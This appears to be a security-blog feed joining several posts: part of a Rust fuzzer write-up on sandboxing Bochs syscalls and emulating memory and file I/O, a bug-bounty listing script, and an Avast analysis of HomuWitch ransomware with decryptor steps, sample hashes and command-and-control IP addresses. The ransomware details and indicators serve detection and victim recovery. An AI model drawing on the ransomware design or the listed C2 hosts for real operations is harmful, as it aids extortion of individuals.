So now for example, if during a read syscall, we get passed a NULL buffer, we can return an error code and set errno appropriately from the syscall handler in Lucid:

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

There may still be other accesses to fs and gs that I’m not currently sandboxing, but we haven’t reached that part of development yet.

Building Bochs

I put off building and loading Bochs for a long time because I wanted to make sure I had the foundations of context-switching and syscall-sandboxing built. I was also worried that it would be difficult, since getting vanilla Bochs built --static-pie was tricky for me initially. To complicate building Bochs in general, we need to build Bochs against our custom Musl. This means that we’ll need a compiler that we can tell to ignore whatever standard C library it normally uses and use our custom Musl libc instead. This proved quite tedious and difficult for me. Once I was successful, I came to realize that wasn’t enough. Bochs, being a C++ code base, also required access to standard C++ library functions. This simply could not work the way it had with the test program, because I didn’t have a C++ standard library that had been built against our custom Musl.

Luckily, there is an awesome project called musl-cross-make, which aims to help people build their own Musl toolchains from scratch. This is perfect for what we need because we require a complete toolchain: we need to support the C++ standard library and it needs to be built with our custom Musl. To do this, we use the GNU C++ Library, libstdc++, that is part of the gcc project.

musl-cross-make will pull down all of the constituent toolchain components and create a from-scratch toolchain that utilizes a Musl libc and a libstdc++ built against that Musl. Then all we have to do for our purposes is recompile that Musl libc with the custom patches that we make with Lucid, and then use the toolchain to compile Bochs as --static-pie. It really was as simple as:

  • git clone musl-cross-make
  • configure an x86_64 toolchain target
  • build the toolchain
  • go into its Musl directory, apply our Musl patches
  • configure Musl to build/install into the musl-cross-make output directory
  • re-build Musl libc
  • configure Bochs to use the new toolchain and set the --static-pie flag

This is the Bochs configuration file that I used to build Bochs:

#!/bin/sh

CC="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-gcc"
CXX="/home/h0mbre/musl_stuff/musl-cross-make/output/bin/x86_64-linux-musl-g++"
CFLAGS="-Wall --static-pie -fPIE"
CXXFLAGS="$CFLAGS"

export CC
export CXX
export CFLAGS
export CXXFLAGS

./configure --enable-sb16 \
                --enable-all-optimizations \
                --enable-long-phy-address \
                --enable-a20-pin \
                --enable-cpu-level=6 \
                --enable-x86-64 \
                --enable-vmx=2 \
                --enable-pci \
                --enable-usb \
                --enable-usb-ohci \
                --enable-usb-ehci \
                --enable-usb-xhci \
                --enable-busmouse \
                --enable-e1000 \
                --enable-show-ips \
                --enable-avx \
                --with-nogui

This was enough to get the Bochs binary I wanted to begin testing with. In the future we will likely need to change this configuration file, but for now this works. The repository should have more detailed build instructions and will also include an already-built Bochs binary.

Implementing a Simple MMU

Now that we are loading and executing Bochs and sandboxing it from syscalls, there are several new syscalls that we need to implement such as brk, mmap, and munmap. Our test program was very simple and we hadn’t come across these syscalls yet.

These three syscalls all manipulate memory in some way, so I decided that we needed to implement some sort of Memory-Manager (MMU). To keep things as simple as possible, I decided that, at least for now, we will not be worrying about freeing memory, re-using memory, or unmapping memory. We will simply pre-allocate a pool of memory for both brk calls to use and mmap calls to use, so two pre-allocated pools of memory. We can also just hang the MMU structure off of the execution context so that we always have access to it during syscalls and context-switches.

So far, Bochs really only cares to map in memory that is READ/WRITE, so that works in our favor in terms of simplicity. So to pre-allocate the memory pools, we just do a fairly large mmap call ourselves when we set up the MMU as part of the execution context initialization routine:

// Structure to track memory usage in Bochs
#[derive(Clone)]
pub struct Mmu {
    pub brk_base: usize,        // Base address of brk region, never changes
    pub brk_size: usize,        // Size of the program break region
    pub curr_brk: usize,        // The current program break
    
    pub mmap_base: usize,       // Base address of the `mmap` pool
    pub mmap_size: usize,       // Size of the `mmap` pool
    pub curr_mmap: usize,       // The current `mmap` page base
    pub next_mmap: usize,       // The next allocation base address
}

impl Mmu {
    pub fn new() -> Result<Self, LucidErr> {
        // We don't care where it's mapped
        let addr = std::ptr::null_mut::<libc::c_void>();

        // Straight-forward
        let length = (DEFAULT_BRK_SIZE + DEFAULT_MMAP_SIZE) as libc::size_t;

        // This is normal
        let prot = libc::PROT_WRITE | libc::PROT_READ;

        // This might change at some point?
        let flags = libc::MAP_ANONYMOUS | libc::MAP_PRIVATE;

        // No file backing
        let fd = -1 as libc::c_int;

        // No offset
        let offset = 0 as libc::off_t;

        // Try to `mmap` this block
        let result = unsafe {
            libc::mmap(
                addr,
                length,
                prot,
                flags,
                fd,
                offset
            )
        };

        if result == libc::MAP_FAILED {
            return Err(LucidErr::from("Failed `mmap` memory for MMU"));
        }

        // Create MMU
        Ok(Mmu {
            brk_base: result as usize,
            brk_size: DEFAULT_BRK_SIZE,
            curr_brk: result as usize,
            mmap_base: result as usize + DEFAULT_BRK_SIZE,
            mmap_size: DEFAULT_MMAP_SIZE,
            curr_mmap: result as usize + DEFAULT_BRK_SIZE,
            next_mmap: result as usize + DEFAULT_BRK_SIZE,
        })
    }

Handling memory-management syscalls actually wasn’t too difficult; there were some gotchas early on but we managed to get something working fairly quickly.

Handling brk

brk is a syscall used to increase the size of the data segment in your program. So a typical pattern you’ll see is that the program will call brk(0), which will return the current program break address, and then if the program wants 2 pages of extra memory, it will then call brk(base + 0x2000), and you can see that in the Bochs strace output:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000

So in our syscall handler, I have the following logic for brk:

// brk
        0xC => {
            // Try to update the program break
            if context.mmu.update_brk(a1).is_err() {
                fault!(contextp, Fault::InvalidBrk);
            }

            // Return the program break
            context.mmu.curr_brk as u64
        },

This is effectively a wrapper around the update_brk method we’ve implemented for Mmu, so let’s look at that:

// Logic for handling a `brk` syscall
    pub fn update_brk(&mut self, addr: usize) -> Result<(), ()> {
        // If addr is NULL, just return nothing to do
        if addr == 0 { return Ok(()); }

        // Check to see that the new address is in a valid range
        let limit = self.brk_base + self.brk_size;
        if !(self.curr_brk..limit).contains(&addr) { return Err(()); }

        // So we have a valid program break address, update the current break
        self.curr_brk = addr;

        Ok(())
    }

So if we get a NULL argument in a1, we have nothing to do; nothing in the current MMU state needs adjusting, and we simply return the current program break. If we get a non-NULL argument, we do a sanity check to make sure that our pool of brk memory is large enough to accommodate the request and, if it is, we adjust the current program break and return that to the caller.

Remember, this is so simple because we’ve already pre-allocated all of the memory, so we don’t need to actually do much here besides adjust what amounts to an offset indicating what memory is valid.

Handling mmap and munmap

mmap is a bit more involved, but still easy to track through. For mmap calls, there’s more state we need to track because there are essentially “allocations” taking place that we need to keep in mind. Most mmap calls will have a NULL argument for the address because they don’t care where the memory mapping takes place in virtual memory; in that case, we default to our main method do_mmap that we’ve implemented for Mmu:

// If a1 is NULL, we just do a normal mmap
            if a1 == 0 {
                if context.mmu.do_mmap(a2, a3, a4, a5, a6).is_err() {
                    fault!(contextp, Fault::InvalidMmap);
                }

                // Succesful regular mmap
                return context.mmu.curr_mmap as u64;
            }

// Logic for handling a `mmap` syscall with no fixed address support
    pub fn do_mmap(
        &mut self,
        len: usize,
        prot: usize,
        flags: usize,
        fd: usize,
        offset: usize
    ) -> Result<(), ()> {
        // Page-align the len
        let len = (len + PAGE_SIZE - 1) & !(PAGE_SIZE - 1);

        // Make sure we have capacity left to satisfy this request
        if len + self.next_mmap > self.mmap_base + self.mmap_size { 
            return Err(());
        }

        // Sanity-check that we don't have any weird `mmap` arguments
        if prot as i32 != libc::PROT_READ | libc::PROT_WRITE {
            return Err(())
        }

        if flags as i32 != libc::MAP_PRIVATE | libc::MAP_ANONYMOUS {
            return Err(())
        }

        if fd as i64 != -1 {
            return Err(())
        }

        if offset != 0 {
            return Err(())
        }

        // Set current to next, and set next to current + len
        self.curr_mmap = self.next_mmap;
        self.next_mmap = self.curr_mmap + len;

        // curr_mmap now represents the base of the new requested allocation
        Ok(())
    }

Very simply, we do some sanity checks to make sure we have enough capacity to satisfy the allocation in our mmap memory pool, check that the other arguments are what we’re anticipating, and then simply update the current offset and the next offset. This way we know where to allocate from next time while also being able to return the current allocation base back to the caller.

There is also a case where mmap will be called with a non-NULL address and the MAP_FIXED flag, meaning that the address matters to the caller and the mapping should take place at the provided virtual address. Right now, this occurs early on in the Bochs process:

[devbox:~/bochs/bochs-2.7]$ strace ./bochs
execve("./bochs", ["./bochs"], 0x7ffda7f39ad0 /* 45 vars */) = 0
arch_prctl(ARCH_SET_FS, 0x7fd071a738a8) = 0
set_tid_address(0x7fd071a739d0)         = 289704
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000

For this special case, there is really nothing for us to do since that address is in the brk pool. We already know about that memory and have already created it, so this last mmap call you see above amounts to a NOP for us; there is nothing to do but return the address back to the caller.

At this time, we don’t support MAP_FIXED calls for non-brk pool memory.

For munmap, we also treat this operation as a NOP and return success to the user because we’re not concerned with freeing or re-using memory at this time.

You can see that Bochs does quite a bit of brk and mmap calls and our fuzzer is now capable of handling them all via our MMU:

...
brk(NULL)                               = 0x555555d7c000
brk(0x555555d7e000)                     = 0x555555d7e000
mmap(0x555555d7c000, 4096, PROT_NONE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x555555d7c000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bde000
mmap(NULL, 16384, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bda000
mmap(NULL, 4194324, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd06f7ff000
mmap(NULL, 73728, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bc0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbe000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbd000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbc000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
munmap(0x7fd071bbb000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bbb000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bba000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb8000
brk(0x555555d7f000)                     = 0x555555d7f000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
munmap(0x7fd071bb5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb5000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb4000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb3000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb2000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bb0000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baf000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
munmap(0x7fd071bae000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bae000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bad000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071bab000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071baa000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba7000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba6000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
munmap(0x7fd071ba5000, 4096)            = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba5000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba3000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba1000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071ba0000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9e000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9d000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b9b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
munmap(0x7fd071b99000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b99000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b97000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b96000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
munmap(0x7fd071b94000, 8192)            = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7fd071b94000
...

File I/O

With the MMU out of the way, we needed a way to do file input and output. Bochs is trying to open its configuration file:

open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
close(3)                                = 0
writev(2, [{iov_base="00000000000i[      ] ", iov_len=21}, {iov_base=NULL, iov_len=0}], 200000000000i[      ] ) = 21
writev(2, [{iov_base="reading configuration from .boch"..., iov_len=36}, {iov_base=NULL, iov_len=0}], 2reading configuration from .bochsrc
) = 36
open(".bochsrc", O_RDONLY|O_LARGEFILE)  = 3
read(3, "# You may now use double quotes "..., 1024) = 1024
read(3, "================================"..., 1024) = 1024
read(3, "ig_interface: win32config\n#confi"..., 1024) = 1024
read(3, "ace to AT&T's VNC viewer, cross "..., 1024) = 1024

The way I’ve approached this for now is to pre-read and store the contents of required files in memory when I initialize the Bochs execution context. This has some advantages, because I can imagine a future when we’re fuzzing something and Bochs needs to do file I/O on a disk image file or something else, and it’d be nice to already have that file read into memory and waiting for usage. Emulating the file I/O syscalls then becomes very straightforward; we really only need to keep a bit of metadata and the file contents themselves:

#[derive(Clone)]
pub struct FileTable {
    files: Vec<File>,
}

impl FileTable {
    // We will attempt to open and read all of our required files ahead of time
    pub fn new() -> Result<Self, LucidErr> {
        // Retrieve .bochsrc
        let args: Vec<String> = std::env::args().collect();

        // Check to see if we have a "--bochsrc-path" argument
        if args.len() < 3 || !args.contains(&"--bochsrc-path".to_string()) {
            return Err(LucidErr::from("No `--bochsrc-path` argument"));
        }

        // Search for the value
        let mut bochsrc = None;
        for (i, arg) in args.iter().enumerate() {
            if arg == "--bochsrc-path" {
                if i >= args.len() - 1 {
                    return Err(
                        LucidErr::from("Invalid `--bochsrc-path` value"));
                }
            
                bochsrc = Some(args[i + 1].clone());
                break;
            }
        }

        if bochsrc.is_none() { return Err(
            LucidErr::from("No `--bochsrc-path` value provided")); }
        let bochsrc = bochsrc.unwrap();

        // Try to read the file
        let Ok(data) = read(&bochsrc) else { 
            return Err(LucidErr::from(
                &format!("Unable to read data BLEGH from '{}'", bochsrc)));
        };

        // Create a file now for .bochsrc
        let bochsrc_file = File {
            fd: 3,
            path: ".bochsrc".to_string(),
            contents: data.clone(),
            cursor: 0,
        };

        // Insert the file into the FileTable
        Ok(FileTable {
            files: vec![bochsrc_file],
        })
    }

    // Attempt to open a file
    pub fn open(&mut self, path: &str) -> Result<i32, ()> {
        // Try to find the requested path
        for file in self.files.iter() {
            if file.path == path {
                return Ok(file.fd);
            }
        }

        // We didn't find the file, this really should never happen?
        Err(())
    }

    // Look a file up by fd and then return a mutable reference to it
    pub fn get_file(&mut self, fd: i32) -> Option<&mut File> {
        self.files.iter_mut().find(|file| file.fd == fd)
    }
}

#[derive(Clone)]
pub struct File {
    pub fd: i32,            // The file-descriptor Bochs has for this file
    pub path: String,       // The file-path for this file
    pub contents: Vec<u8>,  // The actual file contents
    pub cursor: usize,      // The current cursor in the file
}

So when Bochs asks to read a file and provides the fd, we just look up the correct file in the FileTable, read its contents out of the File::contents buffer, and then update the cursor struct member to keep track of our current offset into the file.

// read
        0x0 => {
            // Check to make sure we have the requested file-descriptor
            let Some(file) = context.files.get_file(a1 as i32) else {
                println!("Non-existent file fd: {}", a1);
                fault!(contextp, Fault::NoFile);
            };

            // Now we need to make sure the buffer passed to read isn't NULL
            let buf_p = a2 as *mut u8;
            if buf_p.is_null() {
                context.tls.errno = libc::EINVAL;
                return -1_i64 as u64;
            }

            // Adjust read size if necessary
            let length = std::cmp::min(a3, file.contents.len() - file.cursor);

            // Copy the contents over to the buffer
            unsafe { 
                std::ptr::copy(
                    file.contents.as_ptr().add(file.cursor),    // src
                    buf_p,                                      // dst
                    length);                                    // len
            }

            // Adjust the file cursor
            file.cursor += length;

            // Success
            length as u64
        },

open calls are basically just handled as sanity checks at this point to make sure we know what Bochs is trying to access:

// open
        0x2 => {
            // Get pointer to path string we're trying to open
            let path_p = a1 as *const libc::c_char;

            // Make sure it's not NULL
            if path_p.is_null() {
                fault!(contextp, Fault::NullPath);
            }            

            // Create c_str from pointer
            let c_str = unsafe { std::ffi::CStr::from_ptr(path_p) };

            // Create Rust str from c_str
            let Ok(path_str) = c_str.to_str() else {
                fault!(contextp, Fault::InvalidPathStr);
            };

            // Validate the open flags (32768 == O_RDONLY | O_LARGEFILE, the flags Bochs passes)
            if a2 as i32 != 32768 {
                println!("Unhandled file permissions: {}", a2);
                fault!(contextp, Fault::Syscall);
            }

            // Open the file
            let fd = context.files.open(path_str);
            if fd.is_err() {
                println!("Non-existent file path: {}", path_str);
                fault!(contextp, Fault::NoFile);
            }

            // Success
            fd.unwrap() as u64
        },

And that’s really the whole of file I/O right now. Down the line, we’ll need to keep these in mind when we’re doing snapshots and resetting snapshots because the file state will need to be restored differentially, but this is a problem for another day.
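
To make that future work a bit more concrete, here is a hypothetical sketch of what a FileTable snapshot/reset could look like. Neither snapshot nor restore exist in the fuzzer; this is a naive full-copy reset rather than the differential restore mentioned above, and it leans only on the fact that FileTable and File both derive Clone:

// Hypothetical sketch only, not code from the fuzzer: capture the file state
// at snapshot time and copy it back wholesale on every reset
impl FileTable {
    // Take a copy of the current file state when the snapshot is taken
    pub fn snapshot(&self) -> FileTable {
        self.clone()
    }

    // Reset the live file state (cursors and any modified contents) back to
    // the snapshot copy before the next fuzz iteration
    pub fn restore(&mut self, snapshot: &FileTable) {
        *self = snapshot.clone();
    }
}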

Conclusion

The work continues on the fuzzer and I’m still having a blast implementing it; special thanks to everyone mentioned in the repository for their help! Next, we’ll have to pick a fuzzing target and get it running in Bochs. We’ll have to lobotomize the system Bochs is emulating so that it runs our target program in a way we can snapshot and fuzz appropriately. That should be really fun, until then!

Huntr-Com-Bug-Bounties-Collector - Keep Watching New Bug Bounty (Vulnerability) Postings

By: Zion3R


New bug bounty (vulnerability) collector


Requirements
  • Chrome with GUI (if you encounter trouble with script execution, check the status of the VM’s GPU features, if available)
  • Chrome WebDriver

Preview
# python3 main.py

*2024-02-20 16:14:47.836189*

1. Arbitrary File Reading due to Lack of Input Filepath Validation
- Feb 6th 2024 / High (CVE-2024-0964)
- gradio-app/gradio
- https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/

2. View Barcode Image leads to Remote Code Execution
- Jan 31st 2024 / Critical (CVE: Not yet)
- dolibarr/dolibarr
- https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/

(delimiter-based file database)

# vim feeds.db

1|2024-02-20 16:17:40.393240|7fe14fd58ca2582d66539b2fe178eeaed3524342|CVE-2024-0964|https://huntr.com/bounties/25e25501-5918-429c-8541-88832dfd3741/
2|2024-02-20 16:17:40.393987|c6b84ac808e7f229a4c8f9fbd073b4c0727e07e1|CVE: Not yet|https://huntr.com/bounties/f0ffd01e-8054-4e43-96f7-a0d2e652ac7e/
3|2024-02-20 16:17:40.394582|7fead9658843919219a3b30b8249700d968d0cc9|CVE: Not yet|https://huntr.com/bounties/d6cb06dc-5d10-4197-8f89-847c3203d953/
4|2024-02-20 16:17:40.395094|81fecdd74318ce7da9bc29e81198e62f3225bd44|CVE: Not yet|https://huntr.com/bounties/d875d1a2-7205-4b2b-93cf-439fa4c4f961/
5|2024-02-20 16:17:40.395613|111045c8f1a7926174243db403614d4a58dc72ed|CVE: Not yet|https://huntr.com/bounties/10e423cd-7051-43fd-b736-4e18650d0172/

Notes
  • This code is designed to parse HTML elements from huntr.com, so it may not function correctly if the HTML page structure changes.
  • In case of errors during parsing, exception handling has been included, so if it doesn't work as expected, please inspect the HTML source for any changes.
  • If you run into trouble: in a typical cloud environment, the script may not function properly within virtual machines (VMs).


Decrypted: HomuWitch Ransomware

HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users – individuals – rather than institutions and companies. Its prevalence isn’t remarkably large, nor is the requested ransom payment amount, which has allowed the strain to stay relatively under the radar thus far.

During our investigation of the threat, we found a vulnerability, which allowed us to create a free decryption tool for all the HomuWitch victims. We are now sharing this tool publicly to help impacted individuals decrypt their files, free of charge.

Despite a decrease in HomuWitch activity recently, we will continue to closely monitor this threat.

Skip to how to use the HomuWitch ransomware decryptor.

About HomuWitch

HomuWitch is a ransomware written in C# .NET. Its name comes from the file version information of the binary. Victims are usually infected via a SmokeLoader backdoor, masked as pirated software, which later installs a malicious dropper that executes the HomuWitch ransomware. Cases of infection are primarily found in two locations – Poland and Indonesia.

Overview of the dropper responsible for HomuWitch ransomware

HomuWitch Behavior

After execution begins, drive letters are enumerated, and drives with a size smaller than 3,500 MB – as well as the current user’s Pictures, Downloads, and Documents directories – are considered in the encryption process. Then, only files with specific extensions and a size of less than 55 MB are chosen to be encrypted. The list of extensions contains the following:

.pdf, .doc, .docx, .ppt, .pptx, .xls, .py, .rar, .zip, .7z, .txt, .mp4, .JPG, .PNG, .HEIC, .csv, .bbbbbbbbb

HomuWitch transforms the files with a combination of the Deflate algorithm for compression and the AES-CBC algorithm for encryption, appending the .homuencrypted extension to the filename. While most ransomware strains only perform file encryption, HomuWitch also adds file compression, which causes the encrypted files to be smaller than the originals.

HomuWitch file-encryption routine

HomuWitch contains a vulnerability in its encryption process that allows victims to retrieve all of their files without paying the ransom. New or previously unknown samples may use a different encryption schema, so they may not be decryptable without further analysis.

It is also using command-and-control (CnC) infrastructure for its operation, mostly located in Europe. Before encryption, HomuWitch sends the following personal information to its CnC servers:

Computer name, Country code, Keyboard layout, Device ID

HomuWitch CnC communication

After encryption, a ransom note is either retrieved from the CnC server or (in some samples) stored in the sample’s resources. The ransom typically varies from $25 to $70, with payment demanded in the Monero cryptocurrency. Here is an example of a HomuWitch ransom note:

How to use the Avast HomuWitch ransomware decryption tool to decrypt files encrypted by the ransomware

Follow these steps to decrypt your files:

  1. Download the free decryptor here.
  2. Run the executable file. It starts as a wizard, leading you through the configuration of the decryption process.
  3. On the initial page, you can read the license information if you want, but you only need to click “Next”
  4. On the following page, select the list of locations you want to be searched for and decrypted. By default, it contains a list of all local drives:
  5. On the third page, you need to provide a file in its original form and one which was encrypted by the HomuWitch ransomware. Enter both names of the files. If you have an encryption password created by a previous run of the decryptor, you can select “I know the password for decrypting files” option:
  6. The next page is where the password cracking process takes place. Click “Start” when you are ready to start the process. The password cracking process uses all known HomuWitch passwords to determine the correct one.
  7. Once the password is found, you can proceed to decrypt all the encrypted files on your PC by clicking “Next”.
  8. On the final page, you can opt-in to back up your encrypted files. These backups may help if anything goes wrong during the decryption process. This option is on by default, which we recommend. After clicking “Decrypt” the decryption process begins. Let the decryptor work and wait until it finishes decrypting all of your files.

Indicators of Compromise (IoCs)

Samples (SHA256)

03e4f770157c11d86d462cc4e9ebeddee3130565221700841a7239e68409accf
0e42c452b5795a974061712928d5005169126ad1201bd2b9490f377827528e5d
16c3eea8ed3a44ee22dad8e8aec0c8c6b43c23741498f11337779e6621d1fe4e
33dd6dfd51b79dad25357f07a8fb4da47cec010e0f8e6d164c546a18ad2a762c
3546b2dd517a99249ef5fd8dfd2a8fd80cb89dfdc9e38602e1f3115634789316
4ea00f1ffe2bbbf5476c0eb677ac75cf1a765fe5c8ce899f47eb8b344da878ed
6252cda4786396ebd7e9baf8ff0454d6af038aed48a7e4ec33cd9249816db2f4
9343a0714a0e159b1d49b591f0835398076af8c8e2da56cbb8c9b7a15c9707c8
bd90468f50629728d717c53cd7806ba59d6ad9377163d0d3328d6db4db6a3826
cd4c3db443dbfd768c59575ede3b1e26002277c109d39ea020d1bc307374e309
fd32a8c5cd211b057fdf3e7cc27167296c71e3fb42daa488649cdf81f58f6848

Command-and-Control Servers

IP Address         Origin
78.142.0.42        US
79.137.207.233     Germany
185.216.68.97      Netherlands
193.164.150.225    Russia

IoCs are available at https://github.com/avast/ioc/tree/master/HomuWitch

The post Decrypted: HomuWitch Ransomware appeared first on Avast Threat Labs.

Fuzzer Development 2: Sandboxing Syscalls

By: h0mbre

Introduction

If you haven’t heard, we’re developing a fuzzer on the blog these days. I don’t even know if “fuzzer” is the right word for what we’re building, it’s almost more like an execution engine that will expose hooks? Anyways, if you missed the first episode you can catch up here. We are creating a fuzzer that loads a statically built Bochs emulator into itself, and executes Bochs logic while maintaining a sandbox for Bochs. You can think of it as, we were too lazy to implement our own x86_64 emulator from scratch so we’ve just literally taken a complete emulator and stuffed it into our own process to use it. The fuzzer is written in Rust and Bochs is a C++ codebase. Bochs is a full system emulator, so the devices and everything else is just simulated in software. This is great for us because we can simply snapshot and restore Bochs itself to achieve snapshot fuzzing of our target. So the fuzzer runs Bochs and Bochs runs our target. This allows us to snapshot fuzz arbitrarily complex targets: web browsers, kernels, network stacks, etc. This episode, we’ll delve into the concept of sandboxing Bochs from 